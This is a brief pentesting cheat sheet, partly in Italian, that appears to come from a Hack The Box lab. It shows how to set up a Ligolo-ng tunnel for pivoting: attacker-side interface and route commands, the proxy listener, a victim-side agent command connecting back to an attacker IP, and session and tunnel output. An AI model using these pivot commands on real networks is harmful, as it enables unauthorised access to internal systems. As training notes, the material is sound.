# Ligolo-ng ## Ligolo-ng 1. Download proxy and agent form github #### On attacker machine * setup ```bash sudo ip tuntap add user kali mode tun ligolo sudo ip link set ligolo up ``` * route on ip ```bash sudo ip route add 172.16.1.0/24 dev ligolo sudo ip route add 240.0.0.1/32 dev ligolo # local port forwarding ``` ```bash ➜ ligolo-ng_proxy_0.7.5_linux_amd64 git:(master) ✗ sudo ./proxy -selfcert [sudo] password for kali: WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! WARN[0000] Using self-signed certificates WARN[0000] TLS Certificate fingerprint for ligolo is: 40ACCAE48149074DBBA0313961C2F2AB269FF492EE8FA89F3E2C3D2222323A0C INFO[0000] Listening on 0.0.0.0:11601 ``` #### On victim ```bash ./agent -ignore-cert -connect 10.10.14.13:11601 WARN[0000] warning, certificate validation disabled INFO[0000] Connection established addr="10.10.14.13:11601" ``` ### After la connessione * create interface ```shell ligolo-ng » interface_create --name "evil-cha" Creating a new "evil-cha" interface... INFO[0009] Interface created! ``` * select session ```shell ligolo-ng » session ? Specify a session : 1 - root@DANTE-WEB-NIX01 - 10.10.110.100:57614 - a0a78982-645b-46db-b759-20fa6185240a ``` * start tunnel ```shell [Agent : root@DANTE-WEB-NIX01] » tunnel_start [Agent : root@DANTE-WEB-NIX01] » INFO[0270] Starting tunnel to root@DANTE-WEB-NIX01 (a0a78982-645b-46db-b759-20fa6185240a) ``` ### Local Port Forwarding ```shell sudo ip route add 240.0.0.1/32 dev ligolo ``` Ora si può accedere alla porta remota local utilizzando `240.0.0.1` e il numero della porta #### Risorse * * * *